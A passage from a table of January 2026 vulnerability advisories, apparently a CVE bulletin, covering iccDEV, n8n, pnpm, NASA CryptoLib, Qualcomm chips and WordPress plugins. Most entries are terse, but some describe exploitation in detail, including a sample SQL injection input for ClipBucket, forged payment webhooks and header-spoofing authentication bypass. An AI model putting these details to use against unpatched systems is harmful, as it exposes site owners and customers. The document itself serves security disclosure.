| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a heap-buffer-overflow vulnerability in `CIccCLUT::Init()` at `IccProfLib/IccTagLut.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-08 | 8.8 | CVE-2026-22255 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-qv2w-mq3g-73gv https://github.com/InternationalColorConsortium/iccDEV/issues/466 https://github.com/InternationalColorConsortium/iccDEV/pull/469 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below contain Use After Free, Heap-based Buffer Overflow and Integer Overflow or Wraparound and Out-of-bounds Write vulnerabilities in its CIccSparseMatrix::CIccSparseMatrix function. This issue is fixed in version 2.3.1.2. | 2026-01-06 | 7.8 | CVE-2026-21486 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-mg98-j5q2-674w https://github.com/InternationalColorConsortium/iccDEV/commit/1ab7363f38a20089934d3410c88f714eea392bf5 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have an infinite loop in the IccProfile.cpp function, CalcProfileID. This issue is fixed in version 2.3.1.1. | 2026-01-06 | 7.5 | CVE-2026-21507 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-hgp5-r8m9-8qpj https://github.com/InternationalColorConsortium/iccDEV/issues/244 https://github.com/InternationalColorConsortium/iccDEV/commit/3f3ce789d0d2b608c194ed172fa38943519dc198 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have overflows and underflows in CIccXmlArrayType::ParseTextCountNum(). This vulnerability affects users of the iccDEV library who process ICC color profiles. This issue is fixed in version 2.3.1.1. | 2026-01-06 | 7.8 | CVE-2026-21673 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-g66g-f82c-vgm6 https://github.com/InternationalColorConsortium/iccDEV/issues/243 https://github.com/InternationalColorConsortium/iccDEV/commit/32740802ee14418bd14c429d7e2f142d92cd5c4f |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to heap-buffer-overflow vulnerability in IccTagXml(). This issue has been patched in version 2.3.1.2. | 2026-01-07 | 7.8 | CVE-2026-21678 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-9rp2-4c6g-hppf https://github.com/InternationalColorConsortium/iccDEV/issues/55 https://github.com/InternationalColorConsortium/iccDEV/pull/219 https://github.com/InternationalColorConsortium/iccDEV/commit/c6c0f1cf45b48db94266132ccda5280a1a33569d |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Undefined Behavior runtime error. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 7.1 | CVE-2026-21681 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-v4qq-v3c3-x62x https://github.com/InternationalColorConsortium/iccDEV/pull/269 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have Undefined Behavior in `CIccTagSpectralViewingConditions()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 7.1 | CVE-2026-21684 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-fg9m-j9x8-8279 https://github.com/InternationalColorConsortium/iccDEV/issues/216 https://github.com/InternationalColorConsortium/iccDEV/pull/225 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have Undefined Behavior in `CIccTagLut16::Read()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 7.1 | CVE-2026-21685 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-c3xr-6687-5c8p https://github.com/InternationalColorConsortium/iccDEV/issues/213 https://github.com/InternationalColorConsortium/iccDEV/pull/223 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have Undefined Behavior in `CIccTagLutAtoB::Validate()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 7.1 | CVE-2026-21686 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-792q-cqq9-mq4x https://github.com/InternationalColorConsortium/iccDEV/issues/214 https://github.com/InternationalColorConsortium/iccDEV/pull/222 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have Undefined Behavior in `CIccTagCurve::CIccTagCurve()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 7.1 | CVE-2026-21687 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-prmm-g479-4fv7 https://github.com/InternationalColorConsortium/iccDEV/issues/180 https://github.com/InternationalColorConsortium/iccDEV/pull/221 |
| ipaymu--iPaymu Payment Gateway for WooCommerce | The iPaymu Payment Gateway for WooCommerce plugin for WordPress is vulnerable to Missing Authentication in all versions up to, and including, 2.0.2 via the 'check_ipaymu_response' function. This is due to the plugin not validating webhook request authenticity through signature verification or origin checks. This makes it possible for unauthenticated attackers to mark WooCommerce orders as paid by sending crafted POST requests to the webhook endpoint without any payment occurring, as well as enumerate order IDs and obtain valid order keys via GET requests, exposing customer order PII including names, addresses, and purchased products. | 2026-01-07 | 8.2 | CVE-2026-0656 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7e639aed-ec67-4212-9051-1f7465bbfde2?source=cve https://plugins.trac.wordpress.org/browser/ipaymu-for-woocommerce/tags/2.0.2/gateway.php?marks=316-336,370-380#L316 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3429657%40ipaymu-for-woocommerce&new=3429657%40ipaymu-for-woocommerce |
| iWT Ltd.--FaceSentry Access Control System | FaceSentry Access Control System 6.4.8 contains a cleartext password storage vulnerability that allows attackers to access unencrypted credentials in the device's SQLite database. Attackers can directly read sensitive login information stored in /faceGuard/database/FaceSentryWeb.sqlite without additional authentication. | 2026-01-07 | 8.2 | CVE-2019-25279 | Zero Science Lab Vulnerability Advisory IBM X-Force Exchange Vulnerability Entry Packet Storm Security Exploit Entry |
| iWT Ltd.--FaceSentry Access Control System | FaceSentry Access Control System 6.4.8 contains a cleartext transmission vulnerability that allows remote attackers to intercept authentication credentials. Attackers can perform man-in-the-middle attacks to capture HTTP cookie authentication information during network communication. | 2026-01-07 | 7.5 | CVE-2019-25278 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange Entry |
| JanStudio--Gecko | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in JanStudio Gecko allows PHP Local File Inclusion.This issue affects Gecko: from n/a through 1.9.8. | 2026-01-07 | 8.1 | CVE-2025-69080 | https://patchstack.com/database/wordpress/theme/gecko/vulnerability/wordpress-gecko-theme-1-9-8-local-file-inclusion-vulnerability?_s_id=cve |
| jwsthemes--FreeAgent | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in jwsthemes FreeAgent allows PHP Local File Inclusion.This issue affects FreeAgent: from n/a through 2.1.2. | 2026-01-05 | 8.1 | CVE-2025-69087 | https://vdp.patchstack.com/database/wordpress/theme/freeagent/vulnerability/wordpress-freeagent-theme-2-1-2-local-file-inclusion-vulnerability?_s_id=cve |
| Jwsthemes--Issabella | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Jwsthemes Issabella allows PHP Local File Inclusion.This issue affects Issabella: from n/a through 1.1.2. | 2026-01-06 | 8.1 | CVE-2025-69086 | https://patchstack.com/database/wordpress/theme/issabella/vulnerability/wordpress-issabella-theme-1-1-2-local-file-inclusion-vulnerability?_s_id=cve |
| kanboard--kanboard | Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below is vulnerable to a critical authentication bypass when REVERSE_PROXY_AUTH is enabled. The application blindly trusts HTTP headers for user authentication without verifying the request originated from a trusted reverse proxy. An attacker can impersonate any user, including administrators, by simply sending a spoofed HTTP header. This issue is fixed in version 1.2.49. | 2026-01-08 | 9.1 | CVE-2026-21881 | https://github.com/kanboard/kanboard/security/advisories/GHSA-wwpf-3j4p-739w https://github.com/kanboard/kanboard/commit/7af6143e2ad25b5c15549cca8af4341c7ac4e2fc https://github.com/kanboard/kanboard/releases/tag/v1.2.49 |
| KlbTheme--Machic Core | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in KlbTheme Machic Core allows DOM-Based XSS.This issue affects Machic Core: from n/a through 1.2.6. | 2026-01-05 | 7.1 | CVE-2023-49186 | https://vdp.patchstack.com/database/wordpress/plugin/machic-core/vulnerability/wordpress-machic-core-plugin-1-2-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| loopus--WP Cost Estimation & Payment Forms Builder | The WP Cost Estimation plugin for WordPress is vulnerable to arbitrary file uploads and deletion due to missing file type validation in the lfb_upload_form and lfb_removeFile AJAX actions in versions up to, and including, 9.642. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible. Additionally, the attacker can also delete files on the server such as database configuration files, subsequently uploading their own database files. | 2026-01-08 | 9.8 | CVE-2019-25296 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae50aa5d-95e3-4650-9dbf-118b4ba3abda?source=cve https://www.wordfence.com/blog/2019/02/vulnerabilities-patched-in-wp-cost-estimation-plugin/ https://www.zdnet.com/article/another-wordpress-commercial-plugin-gets-exploited-in-the-wild/ https://wpscan.com/vulnerability/9219 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wp-cost-estimation-payment-forms-builder-multiple-vulnerabilities-9-642/ |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Versions 5.5.2-#187 and below allow an attacker to perform Blind SQL Injection through the add comment section within a channel. When adding a comment within a channel, there is a POST request to the /actions/ajax.php endpoint. The obj_id parameter within the POST request to /actions/ajax.php is then used within the user_exists function of the upload/includes/classes/user.class. php file as the $id parameter. It is then used within the count function of the upload/includes/classes/db.class. php file. The $id parameter is concatenated into the query without validation or sanitization, and a user-supplied input like 1' or 1=1-- - can be used to trigger the injection. This issue does not have a fix at the time of publication. | 2026-01-07 | 9.8 | CVE-2026-21875 | https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-crpv-fmc4-j392 |
| Marketing Fire LLC--LoginWP - Pro | Missing Authorization vulnerability in Marketing Fire LLC LoginWP - Pro allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects LoginWP - Pro: from n/a through 4.0.8.5. | 2026-01-05 | 7.5 | CVE-2025-46255 | https://vdp.patchstack.com/database/wordpress/plugin/loginwp-pro/vulnerability/wordpress-loginwp-pro-plugin-4-0-8-5-settings-change-vulnerability?_s_id=cve |
| Meow Apps--Media File Renamer | Unrestricted Upload of File with Dangerous Type vulnerability in Meow Apps Media File Renamer allows Using Malicious Files.This issue affects Media File Renamer: from n/a through 5.7.7. | 2026-01-05 | 9.1 | CVE-2023-50897 | https://vdp.patchstack.com/database/wordpress/plugin/media-file-renamer/vulnerability/wordpress-media-file-renamer-plugin-5-7-7-arbitrary-file-rename-lead-to-rce-vulnerability?_s_id=cve |
| Mojoomla--WPCHURCH | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mojoomla WPCHURCH allows Blind SQL Injection.This issue affects WPCHURCH: from n/a through 2.7.0. | 2026-01-07 | 9.3 | CVE-2025-32303 | https://patchstack.com/database/wordpress/plugin/church-management/vulnerability/wordpress-wpchurch-2-7-0-sql-injection-vulnerability?_s_id=cve |
| Mojoomla--WPCHURCH | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mojoomla WPCHURCH allows PHP Local File Inclusion.This issue affects WPCHURCH: from n/a through 2.7.0. | 2026-01-06 | 8.1 | CVE-2025-32304 | https://patchstack.com/database/wordpress/plugin/church-management/vulnerability/wordpress-wpchurch-plugin-2-7-0-local-file-inclusion-vulnerability?_s_id=cve |
| moneyspace--Money Space | The MoneySpace plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.9. This is due to the plugin storing full payment card details (PAN, card holder name, expiry month/year, and CVV) in WordPress post_meta using base64_encode(), and then embedding these values into the publicly accessible mspaylink page's inline JavaScript without any authentication or authorization check. This makes it possible for unauthenticated attackers who know or can guess an order_id to access the mspaylink endpoint and retrieve full credit card numbers and CVV codes directly from the HTML/JS response, constituting a severe PCI-DSS violation. | 2026-01-07 | 8.6 | CVE-2025-13371 | https://www.wordfence.com/threat-intel/vulnerabilities/id/77db827d-9afd-4b59-b0ad-1ad562634c52?source=cve https://github.com/MoneySpace-net/money-space-for-Woocommerce/blob/e79d96cfc1b12cece15c6f0b309045403cc6a9d2/view/mspaylink.php#L164 https://plugins.trac.wordpress.org/browser/money-space/trunk/view/mspaylink.php#L232 https://plugins.trac.wordpress.org/browser/money-space/tags/2.13.9/view/mspaylink.php#L232 https://github.com/MoneySpace-net/money-space-for-Woocommerce/blob/e79d96cfc1b12cece15c6f0b309045403cc6a9d2/view/mspaylink.php#L232 |
| n/a--GNU Wget2 | A security issue was discovered in GNU Wget2 when handling Metalink documents. The application fails to properly validate file paths provided in Metalink <file name> elements. An attacker can abuse this behavior to write files to unintended locations on the system. This can lead to data loss or potentially allow further compromise of the user's environment. | 2026-01-09 | 8.8 | CVE-2025-69194 | https://access.redhat.com/security/cve/CVE-2025-69194 RHBZ#2425773 |
| n/a--GNU Wget2 | A flaw was found in GNU Wget2. This vulnerability, a stack-based buffer overflow, occurs in the filename sanitization logic when processing attacker-controlled URL paths, particularly when filename restriction options are active. A remote attacker can exploit this by providing a specially crafted URL, which, upon user interaction with wget2, can lead to memory corruption. This can cause the application to crash and potentially allow for further malicious activities. | 2026-01-09 | 7.6 | CVE-2025-69195 | https://access.redhat.com/security/cve/CVE-2025-69195 RHBZ#2425770 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Versions starting with 1.65.0 and below 1.121.0 enable an attacker to access files on the underlying server through execution of certain form-based workflows. A vulnerable workflow could grant access to an unauthenticated remote attacker, resulting in exposure of sensitive information stored on the system and may enable further compromise depending on deployment configuration and workflow usage. This issue is fixed in version 1.121.0. | 2026-01-07 | 10 | CVE-2026-21858 | https://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg |
| n8n-io--n8n | n8n is an open source workflow automation platform. In versions 0.121.2 and below, an authenticated attacker may be able to execute malicious code using the n8n service. This could result in full compromise and can impact both self-hosted and n8n Cloud instances. This issue is fixed in version 1.121.3. Administrators can reduce exposure by disabling the Git node and limiting access for untrusted users, but upgrading to the latest version is recommended. | 2026-01-08 | 10 | CVE-2026-21877 | https://github.com/n8n-io/n8n/security/advisories/GHSA-v364-rw7m-3263 https://github.com/n8n-io/n8n/commit/f4b009d00d1f4ba9359b8e8f1c071e3d910a55f6 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the Crypto_AOS_ProcessSecurity function reads memory without valid bounds checking when parsing AOS frame hashes. This issue has been patched in version 1.4.3. | 2026-01-10 | 8.2 | CVE-2026-21898 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-7ch6-2pmg-m853 https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the Crypto_Config_Add_Gvcid_Managed_Parameters function only checks whether gvcid_counter > GVCID_MAN_PARAM_SIZE. As a result, it allows up to the 251st entry, which causes a write past the end of the array, overwriting gvcid_counter located immediately after gvcid_managed_parameters_array[250]. This leads to an out-of-bounds write, and the overwritten gvcid_counter may become an arbitrary value, potentially affecting the parameter lookup/registration logic that relies on it. This issue has been patched in version 1.4.3. | 2026-01-10 | 7.3 | CVE-2026-21897 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-9x7j-gx23-7m5r https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, CryptoLib's KMC crypto service integration is vulnerable to a heap buffer overflow when decoding Base64-encoded ciphertext/cleartext fields returned by the KMC service. The decode destination buffer is sized using an expected output length (len_data_out), but the Base64 decoder writes output based on the actual Base64 input length and does not enforce any destination size limit. An oversized Base64 string in the KMC JSON response can cause out-of-bounds writes on the heap, resulting in process crash and potentially code execution under certain conditions. This issue has been patched in version 1.4.3. | 2026-01-10 | 7.5 | CVE-2026-22697 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-qjx3-83jh-2jc4 https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| neeraj_slit--Brevo for WooCommerce | The Brevo for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'user_connection_id' parameter in all versions up to, and including, 4.0.49 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-08 | 7.2 | CVE-2025-14436 | https://www.wordfence.com/threat-intel/vulnerabilities/id/670f4e26-75c9-40cd-8088-2fa4c40f6feb?source=cve https://plugins.trac.wordpress.org/browser/woocommerce-sendinblue-newsletter-subscription/trunk/woocommerce-sendinblue.php#L164 https://plugins.trac.wordpress.org/browser/woocommerce-sendinblue-newsletter-subscription/trunk/woocommerce-sendinblue.php#L171 https://plugins.trac.wordpress.org/browser/woocommerce-sendinblue-newsletter-subscription/trunk/woocommerce-sendinblue.php#L188 https://plugins.trac.wordpress.org/browser/woocommerce-sendinblue-newsletter-subscription/trunk/src/managers/admin-manager.php#L59 https://plugins.trac.wordpress.org/browser/woocommerce-sendinblue-newsletter-subscription/trunk/src/views/admin_menus.php#L728 https://plugins.trac.wordpress.org/changeset/3434903/woocommerce-sendinblue-newsletter-subscription |
| NREL--BEopt | NREL BEopt 2.8.0.0 contains a DLL hijacking vulnerability that allows attackers to load arbitrary libraries by tricking users into opening application files from remote shares. Attackers can exploit insecure library loading of sdl2.dll and libegl.dll by placing malicious libraries on WebDAV or SMB shares to execute unauthorized code. | 2026-01-07 | 9.8 | CVE-2019-25268 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange BEopt Product Homepage |
| opajaap--WP Photo Album Plus | The WP Photo Album Plus plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shortcode' parameter in all versions up to, and including, 9.1.05.008 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 7.1 | CVE-2025-14835 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0903521d-3b07-4539-97c9-15e6bbe2cc2e?source=cve https://plugins.trac.wordpress.org/browser/wp-photo-album-plus/tags/9.1.05.004/wppa-ajax.php#L43 https://plugins.trac.wordpress.org/browser/wp-photo-album-plus/tags/9.1.05.004/wppa-ajax.php#L1130 https://plugins.trac.wordpress.org/browser/wp-photo-album-plus/tags/9.1.05.004/wppa-filter.php#L125 https://plugins.trac.wordpress.org/browser/wp-photo-album-plus/tags/9.1.05.004/wppa-functions.php#L5617 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3427638%40wp-photo-album-plus%2Ftrunk&old=3426267%40wp-photo-album-plus%2Ftrunk&sfp_email=&sfph_mail= |
| OpenCTI-Platform--opencti | OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Prior to version 6.8.1, the GraphQL mutation "WorkspacePopoverDeletionMutation" allows users to delete workspace-related objects such as dashboards and investigation cases. However, the mutation lacks proper authorization checks to verify ownership of the targeted resources. An attacker can exploit this by supplying an active UUID of another user. Since the API does not validate whether the requester owns the resource, the mutation executes successfully, resulting in unauthorized deletion of the entire workspace. Version 6.8.1 fixes the issue. | 2026-01-05 | 7.1 | CVE-2025-61781 | https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-pr6m-q4g7-342c |
| OPEXUS--eCASE Audit | OPEXUS eCASE Audit allows an authenticated attacker to modify client-side JavaScript or craft HTTP requests to access functions or buttons that have been disabled or blocked by an administrator. Fixed in eCASE Platform 11.14.1.0. | 2026-01-08 | 7.6 | CVE-2026-22230 | url url url |
| OPEXUS--eCase Portal | OPEXUS eCasePortal before version 9.0.45.0 allows an unauthenticated attacker to navigate to the 'Attachments.aspx' endpoint, iterate through predictable values of 'formid', and download or delete all user-uploaded files, or upload new files. | 2026-01-08 | 9.8 | CVE-2026-22234 | url url |
| OPEXUS--eComplaint | OPEXUS eComplaint before version 9.0.45.0 allows an attacker to visit the the 'DocumentOpen.aspx' endpoint, iterate through predictable values of 'chargeNumber', and download any uploaded files. | 2026-01-08 | 7.5 | CVE-2026-22235 | url url |
| opf--openproject | OpenProject is an open-source, web-based project management software. A Local File Read (LFR) vulnerability exists in the work package PDF export functionality of OpenProject prior to version 16.6.4. By uploading a specially crafted SVG file (disguised as a PNG) as a work package attachment, an attacker can exploit the backend image processing engine (ImageMagick). When the work package is exported to PDF, the backend attempts to resize the image, triggering the ImageMagick text: coder. This allows an attacker to read arbitrary local files that the application user has permissions to access (e.g., /etc/passwd, all project configuration files, private project data, etc.). The attack requires permissions to upload attachments to a container that can be exported to PDF, such as a work package. The issue has been patched in version 16.6.4. Those who are unable to upgrade may apply the patch manually. | 2026-01-10 | 9.1 | CVE-2026-22600 | https://github.com/opf/openproject/security/advisories/GHSA-m8f2-cwpq-vvhh https://github.com/opf/openproject/releases/tag/v16.6.4 |
| Plexus--Plexus anblick Digital Signage Management | Plexus anblick Digital Signage Management 3.1.13 contains an open redirect vulnerability in the 'PantallaLogin' script that allows attackers to manipulate the 'pagina' GET parameter. Attackers can craft malicious links that redirect users to arbitrary websites by exploiting improper input validation in the parameter. | 2026-01-06 | 9.8 | CVE-2020-36912 | Zero Science Lab Disclosure (ZSL-2020-5573) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange Entry Plexus Vendor Homepage VulnCheck Advisory: Plexus anblick Digital Signage Management 3.1.13 Open Redirect via Pagina Parameter |
| pnpm--pnpm | pnpm is a package manager. Versions 10.0.0 through 10.25 allow git-hosted dependencies to execute arbitrary code during pnpm install, circumventing the v10 security feature "Dependency lifecycle scripts execution disabled by default". While pnpm v10 blocks postinstall scripts via the onlyBuiltDependencies mechanism, git dependencies can still execute prepare, prepublish, and prepack scripts during the fetch phase, enabling remote code execution without user consent or approval. This issue is fixed in version 10.26.0. | 2026-01-07 | 8.8 | CVE-2025-69264 | https://github.com/pnpm/pnpm/security/advisories/GHSA-379q-355j-w6rj https://github.com/pnpm/pnpm/commit/73cc63504d9bc360c43e4b2feb9080677f03c5b5 |
| pnpm--pnpm | pnpm is a package manager. Versions 6.25.0 through 10.26.2 have a Command Injection vulnerability when using environment variable substitution in .npmrc configuration files with tokenHelper settings. An attacker who can control environment variables during pnpm operations could achieve Remote Code Execution (RCE) in build environments. This issue is fixed in version 10.27.0. | 2026-01-07 | 7.6 | CVE-2025-69262 | https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx https://github.com/pnpm/pnpm/releases/tag/v10.27.0 |
| pnpm--pnpm | pnpm is a package manager. Versions 10.26.2 and below store HTTP tarball dependencies (and git-hosted tarballs) in the lockfile without integrity hashes. This allows the remote server to serve different content on each install, even when a lockfile is committed. An attacker who publishes a package with an HTTP tarball dependency can serve different code to different users or CI/CD environments. The attack requires the victim to install a package that has an HTTP/git tarball in its dependency tree. The victim's lockfile provides no protection. This issue is fixed in version 10.26.0. | 2026-01-07 | 7.5 | CVE-2025-69263 | https://github.com/pnpm/pnpm/security/advisories/GHSA-7vhp-vf5g-r2fw https://github.com/pnpm/pnpm/commit/0958027f88a99ccefe7e9676cdebba393dfbdc85 |
| Pro-Bravia--Sony BRAVIA Digital Signage | Sony BRAVIA Digital Signage 1.7.8 contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive system details through API endpoints. Attackers can retrieve network interface information, server configurations, and system metadata by sending requests to the exposed system API. | 2026-01-06 | 7.5 | CVE-2020-36922 | ExploitDB-49187 Sony BRAVIA Digital Signage Official Homepage BRAVIA Signage Software Resources Sony Professional Display Software Product Page Zero Science Lab Disclosure (ZSL-2020-5610) Packet Storm Security Exploit Entry CXSecurity Vulnerability Database IBM X-Force Vulnerability Exchange VulnCheck Advisory: Sony BRAVIA Digital Signage 1.7.8 Unauthenticated System API Information Disclosure |
| Pro-Bravia--Sony BRAVIA Digital Signage | Sony BRAVIA Digital Signage 1.7.8 contains a remote file inclusion vulnerability that allows attackers to inject arbitrary client-side scripts through the content material URL parameter. Attackers can exploit this vulnerability to hijack user sessions, execute cross-site scripting code, and modify display content by manipulating the input material type. | 2026-01-06 | 7.5 | CVE-2020-36924 | ExploitDB-49186 Sony BRAVIA Digital Signage Product Homepage BRAVIA Signage Software Resources Sony Professional Display Software Product Page Zero Science Lab Disclosure (ZSL-2020-5612) Packet Storm Security Exploit Archive IBM X-Force Exchange Vulnerability Entry CXSecurity Vulnerability Listing VulnCheck Advisory: Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion |
| projectworlds--House Rental and Property Listing | A flaw has been found in projectworlds House Rental and Property Listing 1.0. Impacted is an unknown function of the file /app/register.php?action=reg of the component Signup. This manipulation of the argument image causes unrestricted upload. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-01-06 | 7.3 | CVE-2026-0643 | VDB-339686 | projectworlds House Rental and Property Listing Signup register.php unrestricted upload VDB-339686 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #732563 | projectworlds.com rental And Property Listing Project V1.0 File unrestricted upload https://github.com/1uzpk/cve/issues/4 |
| Qualcomm, Inc.--Snapdragon | Cryptographic issue may occur while encrypting license data. | 2026-01-06 | 8.4 | CVE-2025-47345 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while deinitializing a HDCP session. | 2026-01-06 | 7.8 | CVE-2025-47339 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing a video session to set video parameters. | 2026-01-06 | 7.8 | CVE-2025-47343 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing a secure logging command in the trusted application. | 2026-01-06 | 7.8 | CVE-2025-47346 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing identity credential operations in the trusted application. | 2026-01-06 | 7.8 | CVE-2025-47348 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when multiple threads concurrently access and modify shared resources. | 2026-01-06 | 7.8 | CVE-2025-47356 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while preprocessing IOCTLs in sensors. | 2026-01-06 | 7.8 | CVE-2025-47380 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while passing pages to DSP with an unaligned starting address. | 2026-01-06 | 7.8 | CVE-2025-47388 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption when accessing resources in kernel driver. | 2026-01-06 | 7.8 | CVE-2025-47393 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption when copying overlapping buffers during memory operations due to incorrect offset calculations. | 2026-01-06 | 7.8 | CVE-2025-47394 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption occurs when a secure application is launched on a device with insufficient memory. | 2026-01-06 | 7.8 | CVE-2025-47396 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
